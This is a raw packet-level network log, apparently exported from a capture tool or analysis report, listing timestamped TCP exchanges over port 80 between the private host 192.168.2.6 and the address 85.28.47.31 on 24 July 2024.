                                                                                        Jul 24, 2024 07:14:19.656843901 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.656877995 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.657954931 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.657990932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.658025026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.658025026 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.658044100 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.658072948 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.658477068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.658521891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.658555031 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.658587933 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.658590078 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.658627987 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.658647060 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.662306070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.662342072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.662384033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.662414074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.662570000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.662606001 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.662623882 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.662790060 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.662959099 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.662996054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.663029909 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.663053036 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.663086891 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.663775921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.663810968 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.663845062 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.663871050 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.663893938 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.664680004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.664716959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.664738894 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.664751053 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.664786100 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.664800882 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.664855003 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.665584087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.665618896 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.665652037 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.665652990 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.665673018 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.665790081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.666893005 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.666929007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.666960955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.666994095 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.667021990 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.667419910 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.667455912 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.667478085 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.667490005 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.667524099 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.667540073 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.667651892 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.668167114 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.668203115 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.668224096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.668236971 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.668246031 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.668288946 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.669063091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.669099092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.669126987 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.669131994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.669162035 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.669298887 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.669950008 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.669986010 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.670018911 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.670022011 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.670041084 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.670053005 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.670070887 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.670222998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.670818090 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.670852900 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.670878887 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.670885086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.670898914 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.670933008 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.671884060 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.671919107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.671951056 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.671957970 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.671977043 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.671987057 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.672039986 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.677534103 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.677570105 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.677603006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.677618027 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.677654028 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.677656889 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.677691936 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.677726030 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.677738905 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.677771091 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.679312944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.679347992 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.679379940 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.679385900 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.679385900 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.679416895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.679466963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.679697037 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.679749966 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.679758072 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.679784060 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.679835081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.680526018 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.680562973 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.680596113 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.680598021 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.680619955 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.680641890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.681252003 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.681287050 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.681318045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.681329966 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.681353092 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.681358099 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.681358099 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.681389093 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.681396961 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.681438923 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.682204962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.682240009 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.682271957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.682275057 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.682295084 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.682307005 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.682357073 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.683119059 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.683155060 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.683185101 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.683188915 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.683206081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.683235884 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.684470892 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.684520006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.684537888 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.684556961 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.684609890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.684645891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.684679985 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.684712887 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.684731960 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.684747934 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.684755087 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.685035944 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.741704941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.741792917 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.741910934 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.741910934 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.741988897 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.742023945 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.742050886 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.742070913 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.742547989 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.742579937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.742613077 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.742614985 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.742631912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.742850065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.743431091 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.743463993 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.743496895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.743509054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.743509054 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.743632078 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.744374037 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.744409084 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.744437933 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.744441986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.744478941 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.744507074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.744682074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.745188951 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.745223045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.745255947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.745285034 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.745312929 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.746170998 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.746206045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.746238947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.746248960 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.746248960 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.746376991 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.746933937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.746967077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.746999979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.747004032 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.747025013 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.747035980 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.747044086 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.747085094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.747823000 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.747858047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.747888088 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.747890949 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.747909069 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.748069048 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.748714924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.748749971 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.748773098 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.748784065 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.748790979 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.748835087 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.749593019 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.749628067 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.749660015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.749660015 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.749680996 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.749696016 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.749720097 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.749816895 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.750433922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.750468016 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.750497103 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.750502110 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.750514030 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.750551939 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.751358032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.751393080 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.751419067 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.751424074 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.751440048 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.751458883 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.751477003 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.751506090 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.752216101 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.752250910 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.752284050 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.752305031 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.752361059 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.753068924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.753103018 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.753130913 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.753156900 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.753165007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.753176928 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.753283978 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.753779888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.753814936 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.753834009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.753848076 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.753863096 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.753880978 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.753895998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.753914118 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.753931046 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.753958941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.754722118 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.754755974 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.754781961 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.754790068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.754800081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.754823923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.754842043 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.754915953 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.755676031 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.755711079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.755743027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.755772114 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.755775928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.755795956 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.755806923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.755817890 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.755865097 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.756572962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.756606102 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.756639004 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.756642103 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.756661892 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.756671906 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.756689072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.756740093 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.757622957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.757657051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.757692099 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.757693052 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.757930040 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.757963896 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.757986069 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.757997990 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.758013964 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.758032084 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.758049965 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.758079052 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.758897066 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.758936882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.758955002 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.758970976 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.758985043 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.759005070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.759023905 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.759042978 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.759063005 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.759111881 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.759743929 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.759778023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.759812117 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.759816885 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.759816885 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.759846926 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.759897947 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.760658026 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.760691881 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.760724068 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.760724068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.760742903 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.760757923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.760771990 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.760791063 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.760816097 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.760840893 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.761554003 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.761589050 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.761620045 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.761621952 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:19.761641026 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:19.761655092 CEST804971185.28.47.31192.168.2.6
